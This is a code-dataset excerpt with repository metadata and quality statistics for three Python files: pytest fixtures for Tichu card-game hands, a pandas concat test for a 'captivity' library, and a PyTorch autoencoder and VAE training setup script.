@pytest.fixture(scope='session', autouse='True')
def pass_0():
return Cards([])
@pytest.fixture(scope='session', autouse='True')
def solo_0(Spd_A):
return Cards([Spd_A])
@pytest.fixture(scope='session', autouse='True')
def solo_1(Hrt_5):
return Cards([Hrt_5])
@pytest.fixture(scope='session', autouse='True')
def solo_2(Dragon):
return Cards([Dragon])
@pytest.fixture(scope='session', autouse='True')
def solo_3(Phoenix):
return Cards([Phoenix])
@pytest.fixture(scope='session', autouse='True')
def pair_0(Spd_J, Dia_J):
return Cards([Spd_J, Dia_J])
@pytest.fixture(scope='session', autouse='True')
def pair_1(Spd_7, Phoenix):
return Cards([Spd_7, Phoenix])
@pytest.fixture(scope='session', autouse='True')
def pair_2(Dragon, Phoenix):
return Cards([Dragon, Phoenix]) # no pair
@pytest.fixture(scope='session', autouse='True')
def triple_0(Spd_K, Hrt_K, Dia_K):
return Cards([Spd_K, Hrt_K, Dia_K])
@pytest.fixture(scope='session', autouse='True')
def triple_1(Spd_3, Hrt_3, Phoenix):
return Cards([Spd_3, Hrt_3, Phoenix])
@pytest.fixture(scope='session', autouse='True')
def four_0(Spd_10, Hrt_10, Dia_10, Clb_10):
return Cards([Spd_10, Hrt_10, Dia_10, Clb_10]) # bomb
@pytest.fixture(scope='session', autouse='True')
def four_1(Spd_10, Hrt_10, Dia_10, Phoenix):
return Cards([Spd_10, Hrt_10, Dia_10, Phoenix]) # no bomb
@pytest.fixture(scope='session', autouse='True')
def full_0(Spd_3, Hrt_3, Clb_3, Spd_K, Hrt_K):
return Cards([Spd_3, Hrt_3, Clb_3, Spd_K, Hrt_K])
@pytest.fixture(scope='session', autouse='True')
def full_1(Spd_K, Hrt_K, Phoenix, Spd_3, Hrt_3):
return Cards([Spd_K, Hrt_K, Phoenix, Spd_3, Hrt_3])
@pytest.fixture(scope='session', autouse='True')
def full_2(Spd_4, Hrt_4, Clb_4, Phoenix, Hrt_K):
return Cards([Spd_4, Hrt_4, Clb_4, Phoenix, Hrt_K])
@pytest.fixture(scope='session', autouse='True')
def strt_0(Spd_3, Hrt_4, Clb_5, Spd_6, Hrt_7, Clb_8):
return Cards([Spd_3, Hrt_4, Clb_5, Spd_6, Hrt_7, Clb_8])
@pytest.fixture(scope='session', autouse='True')
def strt_1(Spd_3, Hrt_4, Clb_5, Phoenix, Hrt_7):
return Cards([Spd_3, Hrt_4, Clb_5, Phoenix, Hrt_7])
@pytest.fixture(scope='session', autouse='True')
def strt_2(Majong, Hrt_2, Clb_3, Phoenix, Hrt_4):
return Cards([Majong, Hrt_2, Clb_3, Phoenix, Hrt_4])
@pytest.fixture(scope='session', autouse='True')
def strt_3(Spd_5, Hrt_2, Clb_3, Phoenix, Hrt_4):
return Cards([Spd_5, Hrt_2, Clb_3, Phoenix, Hrt_4])
@pytest.fixture(scope='session', autouse='True')
def strt_4(Spd_5, Spd_6, Spd_7, Spd_8, Spd_9):
return Cards([Spd_5, Spd_6, Spd_7, Spd_8, Spd_9]) # straight bomb
@pytest.fixture(scope='session', autouse='True')
def strt_5(Spd_5, Hrt_2, Clb_6, Phoenix, Hrt_7):
return Cards([Spd_5, Hrt_2, Clb_6, Phoenix, Hrt_7]) # hand (no straight)
@pytest.fixture(scope='session', autouse='True')
def strt_6(Spd_A, Clb_K, Dia_J, Clb_Q, Dragon):
return Cards([Spd_A, Clb_K, Dia_J, Clb_Q, Dragon]) # hand (no straight)
@pytest.fixture(scope='session', autouse='True')
def strt_7(Majong, Hrt_2, Clb_3, Clb_5, Hrt_4):
return Cards([Majong, Hrt_2, Clb_3, Clb_5, Hrt_4])
@pytest.fixture(scope='session', autouse='True')
def ps_0(Spd_J, Dia_J, Clb_Q, Dia_Q):
return Cards([Spd_J, Dia_J, Clb_Q, Dia_Q])
@pytest.fixture(scope='session', autouse='True')
def ps_1(Spd_K, Phoenix, Clb_Q, Dia_Q):
return Cards([Spd_K, Phoenix, Clb_Q, Dia_Q])
@pytest.fixture(scope='session', autouse='True')
def ps_2(Clb_J, Dia_J, Spd_K, Phoenix, Clb_K, Dia_Q):
return Cards([Clb_J, Dia_J, Spd_K, Phoenix, Clb_K, Dia_Q])
@pytest.fixture(scope='session', autouse='True')
def ps_3(Clb_J, Dia_J, Spd_K, Phoenix, Clb_Q, Dia_Q):
return Cards([Clb_J, Dia_J, Spd_K, Phoenix, Clb_Q, Dia_Q])
@pytest.fixture(scope='session', autouse='True')
def ps_4(Clb_J, Phoenix, Spd_K, Hrt_K, Clb_Q, Dia_Q):
return Cards([Clb_J, Phoenix, Spd_K, Hrt_K, Clb_Q, Dia_Q])
@pytest.fixture(scope='session', autouse='True')
def ps_5(Clb_2, Phoenix, Spd_2, Hrt_4):
return Cards([Clb_2, Phoenix, Spd_2, Hrt_4])
# class Player fixtures
@pytest.fixture(scope='session', autouse='True')
def player_0():
return Player()
@pytest.fixture(scope='session', autouse='True')
def player_1():
return Player()
```

- avg_line_length: 28.435961
- max_line_length: 104
- alphanum_fraction: 0.682633
- qsc_code_num_words_quality_signal: 1,875
- qsc_code_num_chars_quality_signal: 11,545
- qsc_code_mean_word_length_quality_signal: 4.024
- qsc_code_frac_words_unique_quality_signal: 0.033067
- qsc_code_frac_chars_top_2grams_quality_signal: 0.161962
- qsc_code_frac_chars_top_3grams_quality_signal: 0.224254
- qsc_code_frac_chars_top_4grams_quality_signal: 0.311465
- qsc_code_frac_chars_dupe_5grams_quality_signal: 0.919284
- qsc_code_frac_chars_dupe_6grams_quality_signal: 0.913983
- qsc_code_frac_chars_dupe_7grams_quality_signal: 0.777601
- qsc_code_frac_chars_dupe_8grams_quality_signal: 0.749636
- qsc_code_frac_chars_dupe_9grams_quality_signal: 0.512392
- qsc_code_frac_chars_dupe_10grams_quality_signal: 0.412459
- qsc_code_frac_chars_replacement_symbols_quality_signal: 0
- qsc_code_frac_chars_digital_quality_signal: 0.028252
- qsc_code_frac_chars_whitespace_quality_signal: 0.12317
- qsc_code_size_file_byte_quality_signal: 11,545
- qsc_code_num_lines_quality_signal: 405
- qsc_code_num_chars_line_max_quality_signal: 105
- qsc_code_num_chars_line_mean_quality_signal: 28.506173
- qsc_code_frac_chars_alphabet_quality_signal: 0.71708
- qsc_code_frac_chars_comments_quality_signal: 0.020702
- qsc_code_cate_xml_start_quality_signal: 0
- qsc_code_frac_lines_dupe_lines_quality_signal: 0.335664
- qsc_code_cate_autogen_quality_signal: 0
- qsc_code_frac_lines_long_string_quality_signal: 0
- qsc_code_frac_chars_string_length_quality_signal: 0.120656
- qsc_code_frac_chars_long_word_length_quality_signal: 0
- qsc_code_frac_lines_string_concat_quality_signal: 0
- qsc_code_cate_encoded_data_quality_signal: 0
- qsc_code_frac_chars_hex_words_quality_signal: 0
- qsc_code_frac_lines_prompt_comments_quality_signal: 0
- qsc_code_frac_lines_assert_quality_signal: 0
- qsc_codepython_cate_ast_quality_signal: 1
- qsc_codepython_frac_lines_func_ratio_quality_signal: 0.328671
- qsc_codepython_cate_var_zero_quality_signal: false
- qsc_codepython_frac_lines_pass_quality_signal: 0.003497
- qsc_codepython_frac_lines_import_quality_signal: 0.013986
- qsc_codepython_frac_lines_simplefunc_quality_signal: 0.328671
- qsc_codepython_score_lines_no_logic_quality_signal: 0.671329
- qsc_codepython_frac_lines_print_quality_signal: 0
- qsc_code_num_words: 0
- qsc_code_num_chars: 0
- qsc_code_mean_word_length: 0
- qsc_code_frac_words_unique: null
- qsc_code_frac_chars_top_2grams: 0
- qsc_code_frac_chars_top_3grams: 1
- qsc_code_frac_chars_top_4grams: 1
- qsc_code_frac_chars_dupe_5grams: 1
- qsc_code_frac_chars_dupe_6grams: 1
- qsc_code_frac_chars_dupe_7grams: 1
- qsc_code_frac_chars_dupe_8grams: 1
- qsc_code_frac_chars_dupe_9grams: 0
- qsc_code_frac_chars_dupe_10grams: 0
- qsc_code_frac_chars_replacement_symbols: 0
- qsc_code_frac_chars_digital: 0
- qsc_code_frac_chars_whitespace: 0
- qsc_code_size_file_byte: 0
- qsc_code_num_lines: 0
- qsc_code_num_chars_line_max: 0
- qsc_code_num_chars_line_mean: 0
- qsc_code_frac_chars_alphabet: 0
- qsc_code_frac_chars_comments: 0
- qsc_code_cate_xml_start: 0
- qsc_code_frac_lines_dupe_lines: 0
- qsc_code_cate_autogen: 0
- qsc_code_frac_lines_long_string: 0
- qsc_code_frac_chars_string_length: 0
- qsc_code_frac_chars_long_word_length: 0
- qsc_code_frac_lines_string_concat: null
- qsc_code_cate_encoded_data: 0
- qsc_code_frac_chars_hex_words: 0
- qsc_code_frac_lines_prompt_comments: 0
- qsc_code_frac_lines_assert: 0
- qsc_codepython_cate_ast: 0
- qsc_codepython_frac_lines_func_ratio: 1
- qsc_codepython_cate_var_zero: 0
- qsc_codepython_frac_lines_pass: 0
- qsc_codepython_frac_lines_import: 0
- qsc_codepython_frac_lines_simplefunc: 1
- qsc_codepython_score_lines_no_logic: 1
- qsc_codepython_frac_lines_print: 0
- effective: 0
- hits: 9
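The high `qsc_code_frac_chars_dupe_*grams_quality_signal` values on this record (0.919 at n=5) reflect how repetitive the fixture file is: the same `@pytest.fixture(...)` / `return Card(...)` pattern recurs dozens of times. A sketch of a duplicate-n-gram measure in that spirit; the real signal appears to be a character-weighted fraction, so this simpler word-gram version is an assumption.

```python
from collections import Counter

def frac_dupe_ngrams(text: str, n: int = 5) -> float:
    """Fraction of word n-grams that occur more than once in `text`."""
    words = text.split()
    grams = [tuple(words[i:i + n]) for i in range(len(words) - n + 1)]
    if not grams:
        return 0.0
    counts = Counter(grams)
    # Count every occurrence of any n-gram that is duplicated.
    dupes = sum(c for c in counts.values() if c > 1)
    return dupes / len(grams)
```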
**Record 3**

- hexsha: c32ae4306fe6b2c78e7137055dc202966cb92401
- size: 571
- ext: py
- lang: Python
- max_stars_repo_path: captivity/tests/test_concat.py
- max_stars_repo_name: maxsnijders/captivity
- max_stars_repo_head_hexsha: c3c2bde554f83e567c8e078db4e6bccda57eff8b
- max_stars_repo_licenses: ["MIT"]
- max_stars_count: null
- max_stars_repo_stars_event_min_datetime: null
- max_stars_repo_stars_event_max_datetime: null
- max_issues_repo_path: captivity/tests/test_concat.py
- max_issues_repo_name: maxsnijders/captivity
- max_issues_repo_head_hexsha: c3c2bde554f83e567c8e078db4e6bccda57eff8b
- max_issues_repo_licenses: ["MIT"]
- max_issues_count: null
- max_issues_repo_issues_event_min_datetime: null
- max_issues_repo_issues_event_max_datetime: null
- max_forks_repo_path: captivity/tests/test_concat.py
- max_forks_repo_name: maxsnijders/captivity
- max_forks_repo_head_hexsha: c3c2bde554f83e567c8e078db4e6bccda57eff8b
- max_forks_repo_licenses: ["MIT"]
- max_forks_count: null
- max_forks_repo_forks_event_min_datetime: null
- max_forks_repo_forks_event_max_datetime: null
- content:

```python
import pytest
def test_concat_with_duplicate_columns():
import captivity
import pandas as pd
with pytest.raises(captivity.CaptivityException):
pd.concat(
[pd.DataFrame({"a": [1], "b": [2]}), pd.DataFrame({"c": [0], "b": [3]}),],
axis=1,
)
def test_concat_mismatching_columns():
import captivity
import pandas as pd
with pytest.raises(captivity.CaptivityException):
pd.concat(
[pd.DataFrame({"a": [1], "b": [2]}), pd.DataFrame({"c": [0], "b": [3]}),],
axis=0,
)
```

- avg_line_length: 23.791667
- max_line_length: 86
- alphanum_fraction: 0.555166
- qsc_code_num_words_quality_signal: 67
- qsc_code_num_chars_quality_signal: 571
- qsc_code_mean_word_length_quality_signal: 4.626866
- qsc_code_frac_words_unique_quality_signal: 0.358209
- qsc_code_frac_chars_top_2grams_quality_signal: 0.141935
- qsc_code_frac_chars_top_3grams_quality_signal: 0.083871
- qsc_code_frac_chars_top_4grams_quality_signal: 0.180645
- qsc_code_frac_chars_dupe_5grams_quality_signal: 0.793548
- qsc_code_frac_chars_dupe_6grams_quality_signal: 0.793548
- qsc_code_frac_chars_dupe_7grams_quality_signal: 0.793548
- qsc_code_frac_chars_dupe_8grams_quality_signal: 0.793548
- qsc_code_frac_chars_dupe_9grams_quality_signal: 0.793548
- qsc_code_frac_chars_dupe_10grams_quality_signal: 0.793548
- qsc_code_frac_chars_replacement_symbols_quality_signal: 0
- qsc_code_frac_chars_digital_quality_signal: 0.023981
- qsc_code_frac_chars_whitespace_quality_signal: 0.269702
- qsc_code_size_file_byte_quality_signal: 571
- qsc_code_num_lines_quality_signal: 23
- qsc_code_num_chars_line_max_quality_signal: 87
- qsc_code_num_chars_line_mean_quality_signal: 24.826087
- qsc_code_frac_chars_alphabet_quality_signal: 0.719424
- qsc_code_frac_chars_comments_quality_signal: 0
- qsc_code_cate_xml_start_quality_signal: 0
- qsc_code_frac_lines_dupe_lines_quality_signal: 0.588235
- qsc_code_cate_autogen_quality_signal: 0
- qsc_code_frac_lines_long_string_quality_signal: 0
- qsc_code_frac_chars_string_length_quality_signal: 0.014011
- qsc_code_frac_chars_long_word_length_quality_signal: 0
- qsc_code_frac_lines_string_concat_quality_signal: 0
- qsc_code_cate_encoded_data_quality_signal: 0
- qsc_code_frac_chars_hex_words_quality_signal: 0
- qsc_code_frac_lines_prompt_comments_quality_signal: 0
- qsc_code_frac_lines_assert_quality_signal: 0
- qsc_codepython_cate_ast_quality_signal: 1
- qsc_codepython_frac_lines_func_ratio_quality_signal: 0.117647
- qsc_codepython_cate_var_zero_quality_signal: true
- qsc_codepython_frac_lines_pass_quality_signal: 0
- qsc_codepython_frac_lines_import_quality_signal: 0.294118
- qsc_codepython_frac_lines_simplefunc_quality_signal: 0
- qsc_codepython_score_lines_no_logic_quality_signal: 0.411765
- qsc_codepython_frac_lines_print_quality_signal: 0
- qsc_code_num_words: 0
- qsc_code_num_chars: 0
- qsc_code_mean_word_length: 0
- qsc_code_frac_words_unique: null
- qsc_code_frac_chars_top_2grams: 0
- qsc_code_frac_chars_top_3grams: 0
- qsc_code_frac_chars_top_4grams: 1
- qsc_code_frac_chars_dupe_5grams: 0
- qsc_code_frac_chars_dupe_6grams: 1
- qsc_code_frac_chars_dupe_7grams: 1
- qsc_code_frac_chars_dupe_8grams: 1
- qsc_code_frac_chars_dupe_9grams: 1
- qsc_code_frac_chars_dupe_10grams: 1
- qsc_code_frac_chars_replacement_symbols: 0
- qsc_code_frac_chars_digital: 0
- qsc_code_frac_chars_whitespace: 0
- qsc_code_size_file_byte: 0
- qsc_code_num_lines: 0
- qsc_code_num_chars_line_max: 0
- qsc_code_num_chars_line_mean: 0
- qsc_code_frac_chars_alphabet: 0
- qsc_code_frac_chars_comments: 0
- qsc_code_cate_xml_start: 0
- qsc_code_frac_lines_dupe_lines: 0
- qsc_code_cate_autogen: 0
- qsc_code_frac_lines_long_string: 0
- qsc_code_frac_chars_string_length: 0
- qsc_code_frac_chars_long_word_length: 0
- qsc_code_frac_lines_string_concat: null
- qsc_code_cate_encoded_data: 0
- qsc_code_frac_chars_hex_words: 0
- qsc_code_frac_lines_prompt_comments: 0
- qsc_code_frac_lines_assert: 0
- qsc_codepython_cate_ast: 0
- qsc_codepython_frac_lines_func_ratio: 0
- qsc_codepython_cate_var_zero: 1
- qsc_codepython_frac_lines_pass: 0
- qsc_codepython_frac_lines_import: 0
- qsc_codepython_frac_lines_simplefunc: 0
- qsc_codepython_score_lines_no_logic: 0
- qsc_codepython_frac_lines_print: 0
- effective: 0
- hits: 7
**Record 4**

- hexsha: c3323793181baabb4518873c0a31ea7347587298
- size: 13,368
- ext: py
- lang: Python
- max_stars_repo_path: setup/categories/ae_setup.py
- max_stars_repo_name: caotians1/OD-test-master
- max_stars_repo_head_hexsha: e272421294a3614bdcdb3a4e4b530f613dad1a1c
- max_stars_repo_licenses: ["MIT"]
- max_stars_count: 3
- max_stars_repo_stars_event_min_datetime: 2020-10-07T18:35:50.000Z
- max_stars_repo_stars_event_max_datetime: 2021-02-23T06:36:21.000Z
- max_issues_repo_path: setup/categories/ae_setup.py
- max_issues_repo_name: caotians1/OD-test-master
- max_issues_repo_head_hexsha: e272421294a3614bdcdb3a4e4b530f613dad1a1c
- max_issues_repo_licenses: ["MIT"]
- max_issues_count: null
- max_issues_repo_issues_event_min_datetime: null
- max_issues_repo_issues_event_max_datetime: null
- max_forks_repo_path: setup/categories/ae_setup.py
- max_forks_repo_name: caotians1/OD-test-master
- max_forks_repo_head_hexsha: e272421294a3614bdcdb3a4e4b530f613dad1a1c
- max_forks_repo_licenses: ["MIT"]
- max_forks_count: 3
- max_forks_repo_forks_event_min_datetime: 2020-10-08T14:38:15.000Z
- max_forks_repo_forks_event_max_datetime: 2021-11-08T11:51:48.000Z
- content:

```python
from __future__ import print_function
import os
from termcolor import colored
import torch
import torch.nn as nn
import torch.optim as optim
from torch.utils.data import DataLoader
import models as Models
import global_vars as Global
from utils.iterative_trainer import IterativeTrainer, IterativeTrainerConfig
from utils.logger import Logger
from datasets import MirroredDataset
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
import numpy as np
from models.autoencoders import VAE_Loss
def get_ae_config(args, model, dataset, home_path, BCE_Loss):
print("Preparing training D1 for %s"%(dataset.name))
# 80%, 20% for local train+test
train_ds, valid_ds = dataset.split_dataset(0.8)
if dataset.name in Global.mirror_augment:
print(colored("Mirror augmenting %s"%dataset.name, 'green'))
new_train_ds = train_ds + MirroredDataset(train_ds)
train_ds = new_train_ds
# Initialize the multi-threaded loaders.
train_loader = DataLoader(train_ds, batch_size=args.batch_size, shuffle=True, num_workers=args.workers, pin_memory=True)
valid_loader = DataLoader(valid_ds, batch_size=args.batch_size, num_workers=args.workers, pin_memory=True)
all_loader = DataLoader(dataset, batch_size=args.batch_size, num_workers=args.workers, pin_memory=True)
# Set up the model
model = model.to(args.device)
# Set up the criterion
criterion = None
if BCE_Loss:
criterion = nn.BCEWithLogitsLoss().to(args.device)
else:
criterion = nn.MSELoss().to(args.device)
model.default_sigmoid = True
# Set up the config
config = IterativeTrainerConfig()
config.name = 'autoencoder_%s_%s'%(dataset.name, model.preferred_name())
config.train_loader = train_loader
config.valid_loader = valid_loader
config.phases = {
'train': {'dataset' : train_loader, 'backward': True},
'test': {'dataset' : valid_loader, 'backward': False},
'all': {'dataset' : all_loader, 'backward': False},
}
config.criterion = criterion
config.classification = False
config.cast_float_label = False
config.autoencoder_target = True
config.stochastic_gradient = True
config.visualize = not args.no_visualize
config.sigmoid_viz = BCE_Loss
config.model = model
config.logger = Logger(home_path)
config.optim = optim.Adam(model.parameters(), lr=1e-3)
config.scheduler = optim.lr_scheduler.ReduceLROnPlateau(config.optim, patience=10, threshold=1e-3, min_lr=1e-6, factor=0.1, verbose=True)
config.max_epoch = 120
if hasattr(model, 'train_config'):
model_train_config = model.train_config()
for key, value in model_train_config.items():
print('Overriding config.%s'%key)
config.__setattr__(key, value)
return config
def get_vae_config(args, model, dataset, home_path, BCE_Loss):
print("Preparing training D1 for %s"%(dataset.name))
# 80%, 20% for local train+test
train_ds, valid_ds = dataset.split_dataset(0.8)
if dataset.name in Global.mirror_augment:
print(colored("Mirror augmenting %s"%dataset.name, 'green'))
new_train_ds = train_ds + MirroredDataset(train_ds)
train_ds = new_train_ds
# Initialize the multi-threaded loaders.
train_loader = DataLoader(train_ds, batch_size=args.batch_size, shuffle=True, num_workers=args.workers, pin_memory=True)
valid_loader = DataLoader(valid_ds, batch_size=args.batch_size, num_workers=args.workers, pin_memory=True)
all_loader = DataLoader(dataset, batch_size=args.batch_size, num_workers=args.workers, pin_memory=True)
# Set up the model
model = model.to(args.device)
# Set up the criterion
criterion = VAE_Loss(model, BCE_Loss)
# Set up the config
config = IterativeTrainerConfig()
config.name = 'vae_%s_%s'%(dataset.name, model.preferred_name())
config.train_loader = train_loader
config.valid_loader = valid_loader
config.phases = {
'train': {'dataset' : train_loader, 'backward': True},
'test': {'dataset' : valid_loader, 'backward': False},
'all': {'dataset' : all_loader, 'backward': False},
}
config.criterion = criterion
config.classification = False
config.cast_float_label = False
config.autoencoder_target = True
config.stochastic_gradient = True
config.visualize = not args.no_visualize
config.sigmoid_viz = False
config.model = model
config.logger = Logger(home_path)
config.optim = optim.Adam(model.parameters(), lr=1e-3)
config.scheduler = optim.lr_scheduler.ReduceLROnPlateau(config.optim, patience=10, threshold=1e-3, min_lr=1e-6, factor=0.1, verbose=True)
config.max_epoch = 120
if hasattr(model, 'train_config'):
model_train_config = model.train_config()
for key, value in model_train_config.items():
print('Overriding config.%s'%key)
config.__setattr__(key, value)
return config
def train_BCE_AE(args, model, dataset):
train_autoencoder(args, model, dataset, BCE_Loss=True)
def train_MSE_AE(args, model, dataset):
train_autoencoder(args, model, dataset, BCE_Loss=False)
def train_autoencoder(args, model, dataset, BCE_Loss):
if BCE_Loss:
model.netid = "BCE." + model.netid
else:
model.netid = "MSE." + model.netid
home_path = Models.get_ref_model_path(args, model.__class__.__name__, dataset.name, model_setup=True, suffix_str=model.netid)
hbest_path = os.path.join(home_path, 'model.best.pth')
hlast_path = os.path.join(home_path, 'model.last.pth')
if not os.path.isdir(home_path):
os.makedirs(home_path)
if not os.path.isfile(hbest_path+".done"):
config = get_ae_config(args, model, dataset, home_path, BCE_Loss=BCE_Loss)
trainer = IterativeTrainer(config, args)
print(colored('Training from scratch', 'green'))
best_loss = 999999999
for epoch in range(1, config.max_epoch+1):
# Track the learning rates.
lrs = [float(param_group['lr']) for param_group in config.optim.param_groups]
config.logger.log('LRs', lrs, epoch)
config.logger.get_measure('LRs').legend = ['LR%d'%i for i in range(len(lrs))]
# One epoch of train and test.
trainer.run_epoch(epoch, phase='train')
trainer.run_epoch(epoch, phase='test')
train_loss = config.logger.get_measure('train_loss').mean_epoch()
test_loss = config.logger.get_measure('test_loss').mean_epoch()
config.logger.writer.add_scalar('train_loss', train_loss, epoch)
config.logger.writer.add_scalar('test_loss', test_loss, epoch)
config.scheduler.step(train_loss)
# vis in tensorboard
for (image, label) in config.valid_loader:
prediction = model(image.cuda()).data.cpu().squeeze().numpy()
prediction = (prediction - prediction.min())/(prediction.max() - prediction.min())
if len(prediction.shape) > 3 and prediction.shape[1] == 3:
prediction = prediction.transpose((0,2,3,1)) # change to N W H C
N = min(prediction.shape[0], 5)
fig, ax = plt.subplots(N, 2)
image = image.data.squeeze().numpy()
image = (image - image.min())/(image.max() - image.min())
if len(image.shape) > 3 and image.shape[1] == 3:
image = image.transpose((0,2,3,1))
for i in range(N):
ax[i, 0].imshow(prediction[i])
ax[i, 1].imshow(image[i])
config.logger.writer.add_figure('Vis', fig, epoch)
plt.close(fig)
break
if config.visualize:
# Show the average losses for all the phases in one figure.
config.logger.visualize_average_keys('.*_loss', 'Average Loss', trainer.visdom)
config.logger.visualize_average_keys('.*_accuracy', 'Average Accuracy', trainer.visdom)
config.logger.visualize_average('LRs', trainer.visdom)
# Save the logger for future reference.
torch.save(config.logger.measures, os.path.join(home_path, 'logger.pth'))
# Saving a checkpoint. Enable if needed!
# if args.save and epoch % 10 == 0:
# print('Saving a %s at iter %s'%(colored('snapshot', 'yellow'), colored('%d'%epoch, 'yellow')))
# torch.save(config.model.state_dict(), os.path.join(home_path, 'model.%d.pth'%epoch))
if args.save and test_loss < best_loss:
print('Updating the on file model with %s'%(colored('%.4f'%test_loss, 'red')))
best_loss = test_loss
torch.save(config.model.state_dict(), hbest_path)
torch.save({'finished':True}, hbest_path+".done")
torch.save(config.model.state_dict(), hlast_path)
if config.visualize:
trainer.visdom.save([trainer.visdom.env])
else:
print("Skipping %s"%(colored(home_path, 'yellow')))
def train_variational_autoencoder(args, model, dataset, BCE_Loss=True):
if BCE_Loss:
model.netid = "BCE." + model.netid
else:
model.netid = "MSE." + model.netid
home_path = Models.get_ref_model_path(args, model.__class__.__name__, dataset.name, model_setup=True, suffix_str=model.netid)
hbest_path = os.path.join(home_path, 'model.best.pth')
hlast_path = os.path.join(home_path, 'model.last.pth')
if not os.path.isdir(home_path):
os.makedirs(home_path)
if not os.path.isfile(hbest_path+".done"):
config = get_vae_config(args, model, dataset, home_path, BCE_Loss)
trainer = IterativeTrainer(config, args)
print(colored('Training from scratch', 'green'))
best_loss = 999999999
for epoch in range(1, config.max_epoch+1):
# Track the learning rates.
lrs = [float(param_group['lr']) for param_group in config.optim.param_groups]
config.logger.log('LRs', lrs, epoch)
config.logger.get_measure('LRs').legend = ['LR%d'%i for i in range(len(lrs))]
# One epoch of train and test.
trainer.run_epoch(epoch, phase='train')
trainer.run_epoch(epoch, phase='test')
train_loss = config.logger.get_measure('train_loss').mean_epoch()
test_loss = config.logger.get_measure('test_loss').mean_epoch()
config.logger.writer.add_scalar('train_loss', train_loss, epoch)
config.logger.writer.add_scalar('test_loss', test_loss, epoch)
config.scheduler.step(train_loss)
# vis in tensorboard
for (image, label) in config.valid_loader:
prediction = model(image.cuda()).data.cpu().squeeze().numpy()
prediction = (prediction - prediction.min()) / (prediction.max() - prediction.min())
if len(prediction.shape) > 3 and prediction.shape[1] == 3:
prediction = prediction.transpose((0,2,3,1)) # change to N W H C
N = min(prediction.shape[0], 5)
fig, ax = plt.subplots(N, 2)
image = image.data.squeeze().numpy()
image = (image - image.min()) / (image.max() - image.min())
if len(image.shape) > 3 and image.shape[1] == 3:
image = image.transpose((0,2,3,1))
for i in range(N):
ax[i, 0].imshow(prediction[i])
ax[i, 1].imshow(image[i])
config.logger.writer.add_figure('Vis', fig, epoch)
plt.close(fig)
break
if config.visualize:
# Show the average losses for all the phases in one figure.
config.logger.visualize_average_keys('.*_loss', 'Average Loss', trainer.visdom)
config.logger.visualize_average_keys('.*_accuracy', 'Average Accuracy', trainer.visdom)
config.logger.visualize_average('LRs', trainer.visdom)
# Save the logger for future reference.
torch.save(config.logger.measures, os.path.join(home_path, 'logger.pth'))
# Saving a checkpoint. Enable if needed!
# if args.save and epoch % 10 == 0:
# print('Saving a %s at iter %s'%(colored('snapshot', 'yellow'), colored('%d'%epoch, 'yellow')))
# torch.save(config.model.state_dict(), os.path.join(home_path, 'model.%d.pth'%epoch))
if args.save and test_loss < best_loss:
print('Updating the on file model with %s'%(colored('%.4f'%test_loss, 'red')))
best_loss = test_loss
torch.save(config.model.state_dict(), hbest_path)
torch.save({'finished':True}, hbest_path+".done")
torch.save(config.model.state_dict(), hlast_path)
if config.visualize:
trainer.visdom.save([trainer.visdom.env])
else:
print("Skipping %s"%(colored(home_path, 'yellow')))
```

- avg_line_length: 43.402597
- max_line_length: 141
- alphanum_fraction: 0.626945
- qsc_code_num_words_quality_signal: 1,699
- qsc_code_num_chars_quality_signal: 13,368
- qsc_code_mean_word_length_quality_signal: 4.75927
- qsc_code_frac_words_unique_quality_signal: 0.135962
- qsc_code_frac_chars_top_2grams_quality_signal: 0.035617
- qsc_code_frac_chars_top_3grams_quality_signal: 0.019787
- qsc_code_frac_chars_top_4grams_quality_signal: 0.013851
- qsc_code_frac_chars_dupe_5grams_quality_signal: 0.921593
- qsc_code_frac_chars_dupe_6grams_quality_signal: 0.921593
- qsc_code_frac_chars_dupe_7grams_quality_signal: 0.921593
- qsc_code_frac_chars_dupe_8grams_quality_signal: 0.911576
- qsc_code_frac_chars_dupe_9grams_quality_signal: 0.898714
- qsc_code_frac_chars_dupe_10grams_quality_signal: 0.898714
- qsc_code_frac_chars_replacement_symbols_quality_signal: 0
- qsc_code_frac_chars_digital_quality_signal: 0.010826
- qsc_code_frac_chars_whitespace_quality_signal: 0.25374
- qsc_code_size_file_byte_quality_signal: 13,368
- qsc_code_num_lines_quality_signal: 307
- qsc_code_num_chars_line_max_quality_signal: 142
- qsc_code_num_chars_line_mean_quality_signal: 43.543974
- qsc_code_frac_chars_alphabet_quality_signal: 0.799719
- qsc_code_frac_chars_comments_quality_signal: 0.085802
- qsc_code_cate_xml_start_quality_signal: 0
- qsc_code_frac_lines_dupe_lines_quality_signal: 0.827273
- qsc_code_cate_autogen_quality_signal: 0
- qsc_code_frac_lines_long_string_quality_signal: 0
- qsc_code_frac_chars_string_length_quality_signal: 0.068171
- qsc_code_frac_chars_long_word_length_quality_signal: 0
- qsc_code_frac_lines_string_concat_quality_signal: 0
- qsc_code_cate_encoded_data_quality_signal: 0
- qsc_code_frac_chars_hex_words_quality_signal: 0
- qsc_code_frac_lines_prompt_comments_quality_signal: 0
- qsc_code_frac_lines_assert_quality_signal: 0
- qsc_codepython_cate_ast_quality_signal: 1
- qsc_codepython_frac_lines_func_ratio_quality_signal: 0.027273
- qsc_codepython_cate_var_zero_quality_signal: false
- qsc_codepython_frac_lines_pass_quality_signal: 0
- qsc_codepython_frac_lines_import_quality_signal: 0.072727
- qsc_codepython_frac_lines_simplefunc_quality_signal: 0
- qsc_codepython_score_lines_no_logic_quality_signal: 0.109091
- qsc_codepython_frac_lines_print_quality_signal: 0.059091
- qsc_code_num_words: 0
- qsc_code_num_chars: 0
- qsc_code_mean_word_length: 0
- qsc_code_frac_words_unique: null
- qsc_code_frac_chars_top_2grams: 0
- qsc_code_frac_chars_top_3grams: 0
- qsc_code_frac_chars_top_4grams: 0
- qsc_code_frac_chars_dupe_5grams: 1
- qsc_code_frac_chars_dupe_6grams: 1
- qsc_code_frac_chars_dupe_7grams: 1
- qsc_code_frac_chars_dupe_8grams: 1
- qsc_code_frac_chars_dupe_9grams: 1
- qsc_code_frac_chars_dupe_10grams: 1
- qsc_code_frac_chars_replacement_symbols: 0
- qsc_code_frac_chars_digital: 0
- qsc_code_frac_chars_whitespace: 0
- qsc_code_size_file_byte: 0
- qsc_code_num_lines: 0
- qsc_code_num_chars_line_max: 0
- qsc_code_num_chars_line_mean: 0
- qsc_code_frac_chars_alphabet: 0
- qsc_code_frac_chars_comments: 0
- qsc_code_cate_xml_start: 0
- qsc_code_frac_lines_dupe_lines: 1
- qsc_code_cate_autogen: 0
- qsc_code_frac_lines_long_string: 0
- qsc_code_frac_chars_string_length: 0
